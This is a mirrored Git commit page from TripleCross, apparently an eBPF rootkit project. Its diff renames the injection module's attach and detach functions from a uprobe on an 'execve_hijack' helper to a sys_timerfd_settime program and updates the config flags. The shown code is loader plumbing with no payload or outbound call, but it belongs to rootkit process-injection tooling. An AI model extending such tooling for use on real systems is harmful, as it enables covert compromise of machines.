admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-25 19:03:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added extraction of original jump instruction and opcodes

Browse Source
This commit is contained in:
h3xduck
2022-03-15 18:36:59 -04:00
parent 0c88d5baa9
commit 671e2d671d
18 changed files with 5736 additions and 1630 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
src/user/include/modules/injection.h
View File

@@ -8,19 +8,19 @@
#include "common.h"
//Connections
int attach_uprobe_execute_command(struct kit_bpf *skel){
skel->links.uprobe_execute_command = bpf_program__attach_uprobe(skel->progs.uprobe_execute_command, false, -1, "/home/osboxes/TFG/src/helpers/execve_hijack", 4992);
printf("SET\n");
return libbpf_get_error(skel->links.tp_sys_enter_execve);
int attach_sys_timerfd_settime(struct kit_bpf *skel){
//skel->links.kprobe_sys_geteuid = bpf_program__attach_uprobe(skel->progs.uprobe_execute_command, false, -1, "/home/osboxes/TFG/src/helpers/execve_hijack", 4992);
skel->links.sys_timerfd_settime = bpf_program__attach(skel->progs.sys_timerfd_settime);
return libbpf_get_error(skel->links.sys_timerfd_settime);
}
int attach_injection_all(struct kit_bpf *skel){
return attach_uprobe_execute_command(skel);
return attach_sys_timerfd_settime(skel);
}
int detach_uprobe_execute_command(struct kit_bpf *skel){
int err = detach_link_generic(skel->links.uprobe_execute_command);
int detach_sys_timerfd_settime(struct kit_bpf *skel){
int err = detach_link_generic(skel->links.sys_timerfd_settime);
if(err<0){
fprintf(stderr, "Failed to detach fs link\n");
return -1;
@@ -29,7 +29,7 @@ int detach_uprobe_execute_command(struct kit_bpf *skel){
}
int detach_injection_all(struct kit_bpf *skel){
return detach_uprobe_execute_command(skel);
return detach_sys_timerfd_settime(skel);
}
#endif

4
src/user/include/modules/module_manager.c
View File

@@ -26,7 +26,7 @@ module_config_t module_config = {
},
.injection_module = {
.all = ON,
.uprobe_execute_command = OFF
.sys_timerfd_settime = OFF
}
};
@@ -88,7 +88,7 @@ int setup_all_modules(){
if(config.injection_module.all == ON){
ret = attach_injection_all(attr.skel);
}else{
if(config.injection_module.uprobe_execute_command == ON) ret = attach_uprobe_execute_command(attr.skel);
if(config.injection_module.sys_timerfd_settime == ON) ret = attach_sys_timerfd_settime(attr.skel);
}
if(ret!=0) return -1;

2
src/user/include/modules/module_manager.h
View File

@@ -37,7 +37,7 @@ typedef struct module_config_t{
struct injection_module {
char all;
char uprobe_execute_command;
char sys_timerfd_settime;
}injection_module;
} module_config_t;